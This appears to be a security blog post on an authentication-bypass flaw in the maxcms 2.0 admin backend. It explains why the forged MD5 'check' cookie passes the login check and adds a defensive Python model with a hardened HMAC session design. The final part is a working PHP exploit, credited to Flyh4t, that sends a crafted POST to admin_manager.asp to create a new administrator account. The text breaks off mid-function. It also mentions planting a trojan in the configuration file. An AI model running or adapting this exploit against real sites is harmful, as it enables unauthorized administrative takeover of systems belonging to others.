The maxcms admin backend has an automatic upgrade function. The ajax injection has been fixed, but this vulnerability has not been fixed yet.
In the previous post there was a question about whether the authentication could be bypassed. The answer is yes, but the premise is that you need to know the path of the admin directory.
Review the vulnerable code:

```vb
Sub checkPower
    dim loginValidate,rsObj : loginValidate = "maxcms2.0"
    err.clear
    on error resume next
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
    loginValidate = md5(getAgent&getIp&rsObj(0))
    if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    checkManagerLevel rsObj(1)
    set rsObj=nothing
End Sub
```
where `rCookie` simply reads the request cookie:

```vb
Function rCookie(cookieName)
    rCookie = request.cookies(cookieName)
End Function
```
The key line is `loginValidate = md5(getAgent & getIp & rsObj(0))`: the `check<username>` cookie is accepted whenever it equals the MD5 of the client's User-Agent, the client IP and the manager's `m_random` column, so the expected value is a deterministic function of request headers and a per-account database value rather than a per-session random token.
This authentication check can therefore be bypassed through cookie forgery. Once past it, you can add a new administrator or modify the configuration file to insert a Trojan.
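As an added illustration (not code from maxcms or from this post), the check above is modelled in Python next to a hardened form: a fresh random session id per login, stored server-side, with an HMAC binding it to the username under a server secret and a constant-time comparison. `SERVER_SECRET` and the function names are assumptions made for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for the demo; in production it is loaded
# from protected configuration, never hard-coded.
SERVER_SECRET = secrets.token_bytes(32)


def weak_login_validate(agent: str, ip: str, m_random: str) -> str:
    """Model of the maxcms check: md5(getAgent & getIp & m_random).

    Every input is either sent by the client or fixed per account, so the
    expected cookie value is identical for every session of the same user
    and carries no server-side secret or per-login randomness.
    """
    return hashlib.md5((agent + ip + m_random).encode()).hexdigest()


def issue_session(username: str) -> tuple[str, str]:
    """Hardened form (assumed design): generate a random session id per login,
    keep it server-side, and hand out a cookie of "<id>.<hmac(username:id)>".
    Returns (stored_session_id, cookie_value)."""
    session_id = secrets.token_hex(16)
    tag = hmac.new(SERVER_SECRET, f"{username}:{session_id}".encode(), "sha256").hexdigest()
    return session_id, f"{session_id}.{tag}"


def strong_validate(username: str, cookie: str, stored_session_id: str) -> bool:
    """Verify the cookie: parse it, recompute the HMAC for this username, and
    compare tag and session id in constant time against the stored value."""
    try:
        session_id, tag = cookie.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{username}:{session_id}".encode(), "sha256").hexdigest()
    return hmac.compare_digest(tag, expected) and hmac.compare_digest(session_id, stored_session_id)
```

Logging out becomes a server-side deletion of the stored session id, which the maxcms scheme cannot express because its expected value never changes.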
Here is an exploit for adding a new administrator.
```php
<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 create new admin exploit
by Flyh4t
team:wolvez security team
site:bbs.wolvez.org
dork:salemax#qq.com
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);
if (!eregi('alert',$resp)) { echo "[~]bad luck, exploit failed"; exit; }

print_r('
+-----------------------------------------------------
[+]cool, exploit success
[+]you have added a new admin user flyh4t'.$name.'/wolvez
+--------------------------------------------------------
');


function send($cmd)
{
    global $host, $path;
    $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n"
```